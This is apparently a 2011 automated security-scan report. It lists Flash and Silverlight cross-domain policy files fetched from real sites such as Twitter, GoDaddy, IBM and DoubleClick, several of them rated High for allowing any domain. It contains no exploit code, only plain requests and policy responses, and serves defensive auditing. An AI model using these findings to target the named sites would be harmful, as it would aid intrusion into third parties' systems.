   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.119. http://www.ft.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

6.120. https://www.godaddy.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

6.121. http://www.ibm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ibm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

6.122. http://www.marketwatch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

6.123. http://www.mmafighting.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

6.124. http://www.moviefone.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

6.125. http://www.netvibes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netvibes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

6.126. http://www.pageflakes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

6.127. http://www.popeater.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

6.128. http://www.realtytrac.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.realtytrac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.realtytrac.com" />
<allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

6.129. http://www.tuaw.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.130. http://aolmobile.aol.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aol.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: aolmobile.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:29 GMT
Server: Apache
Last-Modified: Tue, 10 Oct 2006 19:00:19 GMT
Accept-Ranges: bytes
Content-Length: 404
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush-gslbtest.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" to-ports="80"/>
...[SNIP]...

6.131. http://aolmobile.aolcdn.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aolcdn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: aolmobile.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Oct 2006 19:00:19 GMT
Accept-Ranges: bytes
Content-Length: 404
Content-Type: application/xml
Date: Thu, 05 May 2011 13:00:46 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush-gslbtest.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" to-ports="80"/>
...[SNIP]...

6.132. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:29 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304599829120472; path=/; expires=Thu, 12-May-11 12:50:29 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:20:29 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.133. http://citi.bridgetrack.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server:
Date: Thu, 05 May 2011 00:59:03 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

6.134. http://docs.google.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 06 May 2011 02:51:49 GMT
Date: Thu, 05 May 2011 02:51:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 28868

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.135. http://s.stats.wordpress.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.stats.wordpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.stats.wordpress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:31 GMT
Last-Modified: Mon, 14 Mar 2011 18:45:46 GMT
Server: nginx
Content-Length: 585
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6.136. http://static.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:49:48 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304599788607212; path=/; expires=Thu, 12-May-11 12:49:48 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:19:48 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
...[SNIP]...

6.137. http://stats.wordpress.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:00:01 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "249-4c227139-1010d51d"
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Content-Length: 585

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6.138. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:01 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304592961283422; path=/; expires=Thu, 12-May-11 10:56:01 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 11:26:01 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.139. https://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:51:19 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304599879651013; path=/; expires=Thu, 12-May-11 12:51:19 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:21:19 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.140. http://www.truveo.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>

7. Silverlight cross-domain policy previous next
There are 19 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ads.pointroll.com/clientaccesspolicy.xml
http://api.oscar.aol.com/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://cdn.eyewonder.com/clientaccesspolicy.xml
http://clk.atdmt.com/clientaccesspolicy.xml
http://expapi.oscar.aol.com/clientaccesspolicy.xml
http://metrics.apple.com/clientaccesspolicy.xml
http://o.aolcdn.com/clientaccesspolicy.xml
http://o.sa.aol.com/clientaccesspolicy.xml
http://s.stats.wordpress.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://speed.pointroll.com/clientaccesspolicy.xml
http://sportingnews.122.2o7.net/clientaccesspolicy.xml
http://stats.wordpress.com/clientaccesspolicy.xml
http://www.aol.com/clientaccesspolicy.xml
http://ts1.mm.bing.net/clientaccesspolicy.xml
http://ts2.mm.bing.net/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 05 May 2011 00:56:58 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://ads.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1363"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 05 May 2011 00:56:54 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7.3. http://api.oscar.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.oscar.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Wed, 26 Aug 2009 19:46:35 GMT
ETag: "1398022-15c-47210b5623cc0"
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=1, max=83
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

7.4. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:23 GMT
Date: Thu, 05 May 2011 00:56:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.5. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:59 GMT
Date: Thu, 05 May 2011 00:56:59 GMT
